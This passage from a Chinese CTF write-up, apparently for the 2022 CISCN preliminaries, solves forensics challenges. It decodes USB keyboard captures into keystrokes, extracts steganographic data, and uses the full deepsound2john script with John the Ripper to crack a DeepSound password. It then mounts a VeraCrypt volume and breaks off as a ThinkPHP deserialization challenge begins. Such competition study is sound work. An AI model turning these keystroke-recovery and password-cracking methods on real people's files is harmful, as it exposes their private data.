class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span 
class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br></pre></td><td class="code"><pre><span class="line">tshark -r 2.8.1.pcapng -T fields -e usb.capdat > 2.8.1.txt</span><br><span class="line"></span><br><span class="line">import os,sys</span><br><span class="line"></span><br><span class="line">normalKeys = {</span><br><span class="line"></span><br><span class="line"> "04":"a", "05":"b", "06":"c", "07":"d", "08":"e",</span><br><span class="line"></span><br><span class="line"> "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",</span><br><span class="line"></span><br><span class="line"> "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o",</span><br><span class="line"></span><br><span class="line"> "13":"p", "14":"q", "15":"r", "16":"s", "17":"t",</span><br><span 
class="line"></span><br><span class="line"> "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y",</span><br><span class="line"></span><br><span class="line"> "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4",</span><br><span class="line"></span><br><span class="line"> "22":"5", "23":"6","24":"7","25":"8","26":"9",</span><br><span class="line"></span><br><span class="line"> "27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t",</span><br><span class="line"></span><br><span class="line"> "2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\",</span><br><span class="line"></span><br><span class="line"> "32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".",</span><br><span class="line"></span><br><span class="line"> "38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>",</span><br><span class="line"></span><br><span class="line"> "3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>",</span><br><span class="line"></span><br><span class="line"> "44":"<F11>","45":"<F12>"}</span><br><span class="line"></span><br><span class="line">shiftKeys = {</span><br><span class="line"></span><br><span class="line"> "04":"A", "05":"B", "06":"C", "07":"D", "08":"E",</span><br><span class="line"></span><br><span class="line"> "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",</span><br><span class="line"></span><br><span class="line"> "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O",</span><br><span class="line"></span><br><span class="line"> "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",</span><br><span class="line"></span><br><span class="line"> "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y",</span><br><span class="line"></span><br><span class="line"> "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$",</span><br><span class="line"></span><br><span class="line"> "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")",</span><br><span class="line"></span><br><span class="line"> "28":"<RET>","29":"<ESC>","2a":"<DEL>", 
"2b":"\t","2c":"<SPACE>",</span><br><span class="line"></span><br><span class="line"> "2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":""",</span><br><span class="line"></span><br><span class="line"> "34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>",</span><br><span class="line"></span><br><span class="line"> "3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>",</span><br><span class="line"></span><br><span class="line"> "41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">#pcapFilePath = sys.argv[1]</span><br><span class="line"></span><br><span class="line">#os.system("tshark -r "+pcapFilePath+" -T fields -e usb.capdata | sed '/^\s*$/d' > out.txt")</span><br><span class="line"></span><br><span class="line">output = []</span><br><span class="line"></span><br><span class="line">keys = open('./2.8.1.txt')</span><br><span class="line"></span><br><span class="line">for line in keys:</span><br><span class="line"></span><br><span class="line"> line = ''.join(line[i:i+2]+':' for i in range(0,len(line)-1,2)).strip(':') </span><br><span class="line"></span><br><span class="line"> try:</span><br><span class="line"></span><br><span class="line"> if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":</span><br><span class="line"></span><br><span class="line"> continue</span><br><span class="line"></span><br><span class="line"> if line[6:8] in normalKeys.keys():</span><br><span class="line"></span><br><span class="line"> output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']</span><br><span class="line"></span><br><span class="line"> else:</span><br><span 
class="line"></span><br><span class="line"> output += ['[unknown]']</span><br><span class="line"></span><br><span class="line"> except:</span><br><span class="line"></span><br><span class="line"> pass</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">keys.close()</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">flag=0</span><br><span class="line"></span><br><span class="line">#print("".join(output))</span><br><span class="line"></span><br><span class="line">for i in range(len(output)):</span><br><span class="line"></span><br><span class="line"> try:</span><br><span class="line"></span><br><span class="line"> a=output.index('<DEL>')</span><br><span class="line"></span><br><span class="line"> del output[a]</span><br><span class="line"></span><br><span class="line"> del output[a-1]</span><br><span class="line"></span><br><span class="line"> except:</span><br><span class="line"></span><br><span class="line"> pass</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">for i in range(len(output)):</span><br><span class="line"></span><br><span class="line"> try:</span><br><span class="line"></span><br><span class="line"> if output[i]=="<CAP>":</span><br><span class="line"></span><br><span class="line"> flag+=1</span><br><span class="line"></span><br><span class="line"> output.pop(i)</span><br><span class="line"></span><br><span class="line"> if flag==2:</span><br><span class="line"></span><br><span class="line"> flag=0</span><br><span class="line"></span><br><span class="line"> if flag!=0:</span><br><span class="line"></span><br><span class="line"> output[i]=output[i].upper()</span><br><span class="line"></span><br><span class="line"> except:</span><br><span class="line"></span><br><span class="line"> pass</span><br><span class="line"></span><br><span class="line"> 
</span><br><span class="line"></span><br><span class="line">print ('output :' + "".join(output))</span><br><span class="line"></span><br><span class="line">os.system("rm -rf 2.8.1.txt")</span><br></pre></td></tr></table></figure><p>得到加密的压缩包,同样方式提取</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c20540e4d89a5ef7cfe0007669a16f23.gif" alt="图片"></p><p>得到压缩包密码</p><p><code>output :35c535765e50074a</code></p><p>解密得到flag</p><p><code>flag{20de17cc-d2c1-4b61-bebd-41159ed7172d}</code></p><h2 id="everlasting-night"><a href="#everlasting-night" class="headerlink" title="everlasting_night"></a>everlasting_night</h2><p>stegsolve 查看图片发现</p><p><img src="https://img-blog.csdnimg.cn/img_convert/4db01ce28c8e7a13d0f3053e0fca32bf.gif" alt="图片"></p><p>得到一个密码,考虑 lsb 隐写加密</p><p><img src="https://img-blog.csdnimg.cn/img_convert/bc2fde86a93d1e241d7e2e61398accf4.gif" alt="图片"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 lsb.py extract everlasting_night.png out.txt f78dcd383f1b574b</span><br></pre></td></tr></table></figure><p>得到 zip,发现被加密,想到 png 后面还有一串字符没用</p><p><img src="/2023/12/05/2022%20CISCN%20%E5%88%9B%E6%96%B0%E8%83%BD%E5%8A%9B%E5%AE%9E%E8%B7%B5%E8%B5%9B%E5%88%9D%E8%B5%9BWP/" alt="图片"></p><p>经过各种尝试最后发现是 md5,somd5 解密就好了得到压缩包密码</p><p><code>ohhWh04m1</code></p><p><img src="https://img-blog.csdnimg.cn/img_convert/b337fa77ecd911a2b5e895684bcd4594.gif" alt="图片"></p><p>010 打开发现 png 但是不是正常的图片,gimp 打开看一下</p><p><img src="https://img-blog.csdnimg.cn/img_convert/a6d5938806d8c8b8a9798f83fdcf1155.gif" alt="图片"></p><p><code>flag{607f41da-e849-4c0b-8867-1b3c74536cc4}</code></p><h2 id="babydisk"><a href="#babydisk" class="headerlink" title="babydisk"></a>babydisk</h2><p>附件是 vmdk 文件,可以直接拿 Diskgenius 挂载,也可以使用 winhex 等等。这里我使用 DiskGenius 挂载</p><p><img src="https://img-blog.csdnimg.cn/img_convert/06bc5218170a42aee8e4caf18031f9dd.gif" alt="图片"></p><p>挂载后能看到有个 wav</p><p><img 
src="https://img-blog.csdnimg.cn/img_convert/af82c585e9972d3ea1b9e4aa8273fdca.gif" alt="图片"></p><p>右击-复制到桌面可以提取出来,010 查看没啥东西,wav 的隐写有 deepsound 和 silenteye 或者还有其他,先用deepsound 试一下,用 deepsound 打开如果能显示存在密码说明就是 deepsound 隐写的</p><p><img src="https://img-blog.csdnimg.cn/img_convert/8e7f0ac272d2cd4466942efe49e9b0ed.gif" alt="图片"></p><p>现在的问题是需要一个密码,那就谷歌搜一下</p><p><img src="https://img-blog.csdnimg.cn/img_convert/9b83ad8e1b06b250a83be213a1436ffb.gif" alt="图片"></p><p>里面的文章恰好完成了我们的需求</p><p><a href="https://blog.csdn.net/weixin_45696568/article/details/118573215">https://blog.csdn.net/weixin_45696568/article/details/118573215</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span 
class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span 
class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span 
class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span 
class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python3</span><br><span class="line"></span><br><span class="line">'''</span><br><span class="line"></span><br><span class="line">deepsound2john extracts password hashes from audio files containing encrypted</span><br><span class="line"></span><br><span class="line">data steganographically embedded by DeepSound (http://jpinsoft.net/deepsound/).</span><br><span class="line"></span><br><span class="line">This method is known to work with files created by DeepSound 2.0.</span><br><span class="line"></span><br><span class="line">Input files should be in .wav format. 
Hashes can be recovered from audio files</span><br><span class="line"></span><br><span class="line">even after conversion from other formats, e.g.,</span><br><span class="line"></span><br><span class="line"> ffmpeg -i input output.wav</span><br><span class="line"></span><br><span class="line">Usage:</span><br><span class="line"></span><br><span class="line"> python3 deepsound2john.py carrier.wav > hashes.txt</span><br><span class="line"></span><br><span class="line"> john hashes.txt</span><br><span class="line"></span><br><span class="line">This software is copyright (c) 2018 Ryan Govostes <[email protected]>, and</span><br><span class="line"></span><br><span class="line">it is hereby released to the general public under the following terms:</span><br><span class="line"></span><br><span class="line">Redistribution and use in source and binary forms, with or without</span><br><span class="line"></span><br><span class="line">modification, are permitted.</span><br><span class="line"></span><br><span class="line">'''</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">import logging</span><br><span class="line"></span><br><span class="line">import os</span><br><span class="line"></span><br><span class="line">import sys</span><br><span class="line"></span><br><span class="line">import textwrap</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">def decode_data_low(buf):</span><br><span class="line"></span><br><span class="line"> return buf[::2]</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">def decode_data_normal(buf):</span><br><span class="line"></span><br><span class="line"> out = bytearray()</span><br><span class="line"></span><br><span class="line"> for i in range(0, len(buf), 4):</span><br><span 
class="line"></span><br><span class="line">        out.append((buf[i] & 15) << 4 | (buf[i + 2] & 15))</span><br><span class="line"></span><br><span class="line">    return out</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">def decode_data_high(buf):</span><br><span class="line"></span><br><span class="line">    out = bytearray()</span><br><span class="line"></span><br><span class="line">    for i in range(0, len(buf), 8):</span><br><span class="line"></span><br><span class="line">        out.append((buf[i] & 3) << 6 | (buf[i + 2] & 3) << 4 \</span><br><span class="line"></span><br><span class="line">                   | (buf[i + 4] & 3) << 2 | (buf[i + 6] & 3))</span><br><span class="line"></span><br><span class="line">    return out</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">def is_magic(buf):</span><br><span class="line"></span><br><span class="line">    # This is a more efficient way of testing for the `DSCF` magic header without</span><br><span class="line"></span><br><span class="line">    # decoding the whole buffer</span><br><span class="line"></span><br><span class="line">    return (buf[0] & 15) == (68 >> 4) and (buf[2] & 15) == (68 & 15) \</span><br><span class="line"></span><br><span class="line">        and (buf[4] & 15) == (83 >> 4) and (buf[6] & 15) == (83 & 15) \</span><br><span class="line"></span><br><span class="line">        and (buf[8] & 15) == (67 >> 4) and (buf[10] & 15) == (67 & 15) \</span><br><span class="line"></span><br><span class="line">        and (buf[12] & 15) == (70 >> 4) and (buf[14] & 15) == (70 & 15)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">def is_wave(buf):</span><br><span class="line"></span><br><span class="line">    return buf[0:4] == b'RIFF' and buf[8:12] == 
b'WAVE'</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">def process_deepsound_file(f):</span><br><span class="line"></span><br><span class="line">    bname = os.path.basename(f.name)</span><br><span class="line"></span><br><span class="line">    logger = logging.getLogger(bname)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">    # Check if it's a .wav file</span><br><span class="line"></span><br><span class="line">    buf = f.read(12)</span><br><span class="line"></span><br><span class="line">    if not is_wave(buf):</span><br><span class="line"></span><br><span class="line">        global convert_warn</span><br><span class="line"></span><br><span class="line">        logger.error('file not in .wav format')</span><br><span class="line"></span><br><span class="line">        convert_warn = True</span><br><span class="line"></span><br><span class="line">        return</span><br><span class="line"></span><br><span class="line">    f.seek(0, os.SEEK_SET)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">    # Scan for the marker...</span><br><span class="line"></span><br><span class="line">    hdrsz = 104</span><br><span class="line"></span><br><span class="line">    hdr = None</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">    while True:</span><br><span class="line"></span><br><span class="line">        off = f.tell()</span><br><span class="line"></span><br><span class="line">        buf = f.read(hdrsz)</span><br><span class="line"></span><br><span class="line">        if len(buf) < hdrsz: break</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">        if is_magic(buf):</span><br><span class="line"></span><br><span class="line">            hdr = 
decode_data_normal(buf)</span><br><span class="line"></span><br><span class="line">            logger.info('found DeepSound header at offset %i', off)</span><br><span class="line"></span><br><span class="line">            break</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">        f.seek(-hdrsz + 1, os.SEEK_CUR)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">    if hdr is None:</span><br><span class="line"></span><br><span class="line">        logger.warning('does not appear to be a DeepSound file')</span><br><span class="line"></span><br><span class="line">        return</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">    # Check some header fields</span><br><span class="line"></span><br><span class="line">    mode = hdr[4]</span><br><span class="line"></span><br><span class="line">    encrypted = hdr[5]</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">    modes = {2: 'low', 4: 'normal', 8: 'high'}</span><br><span class="line"></span><br><span class="line">    if mode in modes:</span><br><span class="line"></span><br><span class="line">        logger.info('data is encoded in %s-quality mode', modes[mode])</span><br><span class="line"></span><br><span class="line">    else:</span><br><span class="line"></span><br><span class="line">        logger.error('unexpected data encoding mode %i', mode)</span><br><span class="line"></span><br><span class="line">        return</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">    if encrypted == 0:</span><br><span class="line"></span><br><span class="line">        logger.warning('file is not encrypted')</span><br><span class="line"></span><br><span class="line">        return</span><br><span class="line"></span><br><span class="line">    elif encrypted != 1:</span><br><span 
class="line"></span><br><span class="line">        logger.error('unexpected encryption flag %i', encrypted)</span><br><span class="line"></span><br><span class="line">        return</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">    sha1 = hdr[6:6+20]</span><br><span class="line"></span><br><span class="line">    print('%s:$dynamic_1529$%s' % (bname, sha1.hex()))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == '__main__':</span><br><span class="line"></span><br><span class="line">    import argparse</span><br><span class="line"></span><br><span class="line">    parser = argparse.ArgumentParser()</span><br><span class="line"></span><br><span class="line">    parser.add_argument('--verbose', '-v', action='store_true')</span><br><span class="line"></span><br><span class="line">    parser.add_argument('files', nargs='+', metavar='file',</span><br><span class="line"></span><br><span class="line">                        type=argparse.FileType('rb', bufsize=4096))</span><br><span class="line"></span><br><span class="line">    args = parser.parse_args()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    if args.verbose:</span><br><span class="line"></span><br><span class="line">        logging.basicConfig(level=logging.INFO)</span><br><span class="line"></span><br><span class="line">    else:</span><br><span class="line"></span><br><span class="line">        logging.basicConfig(level=logging.WARN)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">    convert_warn = False</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">    for f in args.files:</span><br><span class="line"></span><br><span class="line">        process_deepsound_file(f)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">    if 
convert_warn:</span><br><span class="line"></span><br><span class="line">        print(textwrap.dedent('''</span><br><span class="line"></span><br><span class="line">            ---------------------------------------------------------------</span><br><span class="line"></span><br><span class="line">            Some files were not in .wav format. Try converting them to .wav</span><br><span class="line"></span><br><span class="line">            and try again. You can use: ffmpeg -i input output.wav</span><br><span class="line"></span><br><span class="line">            ---------------------------------------------------------------</span><br><span class="line"></span><br><span class="line">            '''.rstrip()), file=sys.stderr)</span><br></pre></td></tr></table></figure><p>First use the script to extract the hash, then crack it with john.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/2e013892de80d5b1709014b4b876ab67.gif" alt="图片"></p><p>The password turns out to be feedback</p><p><img src="https://img-blog.csdnimg.cn/img_convert/f3bce5aad5fdc50397272e340d8ae3c1.gif" alt="图片"></p><p>This yields key.txt</p><p><img src="https://img-blog.csdnimg.cn/img_convert/81cc27a1fef1cb100d64e0f3ada660e8.gif" alt="图片"></p><p>Getting a key at this point surely means something still needs decrypting. Consider what is left to work with: the audio has been fully processed, so the vmdk probably holds something not yet discovered. Mount it with FTK to check.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/b49cbd2de5c39cffeef092f9cca3379c.gif" alt="图片"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/2afd8db44e244dd055b462913087339b.gif" alt="图片"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/18f43970ae7a5e66986c30d0d8912222.gif" alt="图片"></p><p>Two files turn up in the Recycle Bin; export them and have a look. Together with the password just obtained, this points to VeraCrypt or TrueCrypt (I forget the exact name). After some trial, VeraCrypt can mount it: the file $RDWTTK4 mounts successfully.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/99537e5484aff08c286455446cbdc9e2.gif" alt="图片"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/825e926e1f7afd7d5e6f1d9f0d0b8e8b.gif" alt="图片"></p><p>spiral is a 
zip, and the data inside turns out to be jumbled.</p><p>What follows is the reproduction part.</p><p>Search for <code>spiral</code></p><p><img src="https://img-blog.csdnimg.cn/img_convert/44bd78107d1e1e51234747a68d074593.gif" alt="图片"></p><p><a href="https://blog.csdn.net/GW_wg/article/details/120406192">https://blog.csdn.net/GW_wg/article/details/120406192</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span 
class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line">def function(n):</span><br><span class="line"></span><br><span class="line">    matrix = [[0] * n for _ in range(n)]</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">    number = 1</span><br><span class="line"></span><br><span class="line">    left, right, up, down = 0, n - 1, 0, n - 1</span><br><span class="line"></span><br><span class="line">    while left < right and up < down:</span><br><span class="line"></span><br><span class="line">        # left to right</span><br><span class="line"></span><br><span class="line">        for i in range(left, right):</span><br><span class="line"></span><br><span class="line">            matrix[up][i] = number</span><br><span class="line"></span><br><span class="line">            number += 1</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">        # top to bottom</span><br><span class="line"></span><br><span class="line">        for i in range(up, down):</span><br><span class="line"></span><br><span class="line">            matrix[i][right] = number</span><br><span class="line"></span><br><span class="line">            number += 1</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">        # right to left</span><br><span class="line"></span><br><span class="line">        for i in range(right, left, -1):</span><br><span class="line"></span><br><span class="line">            matrix[down][i] = number</span><br><span class="line"></span><br><span class="line">            number += 1</span><br><span class="line"></span><br><span class="line"> 
</span><br><span class="line"></span><br><span class="line">        for i in range(down, up, -1):</span><br><span class="line"></span><br><span class="line">            matrix[i][left] = number</span><br><span class="line"></span><br><span class="line">            number += 1</span><br><span class="line"></span><br><span class="line">        left += 1</span><br><span class="line"></span><br><span class="line">        right -= 1</span><br><span class="line"></span><br><span class="line">        up += 1</span><br><span class="line"></span><br><span class="line">        down -= 1</span><br><span class="line"></span><br><span class="line">    # when n is odd the single centre cell of the square is left over and must be filled separately</span><br><span class="line"></span><br><span class="line">    if n % 2 != 0:</span><br><span class="line"></span><br><span class="line">        matrix[n // 2][n // 2] = number</span><br><span class="line"></span><br><span class="line">    return matrix</span><br></pre></td></tr></table></figure><h1 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h1><h2 id="Ezpop"><a href="#Ezpop" class="headerlink" title="Ezpop"></a>Ezpop</h2><p>Directory scanning finds <code>www.zip</code>; download the source and audit it. Together with the challenge hint, this is an old ThinkPHP (tp) vulnerability, so look up the public gadget chain.</p><p>poc</p><figure class="highlight 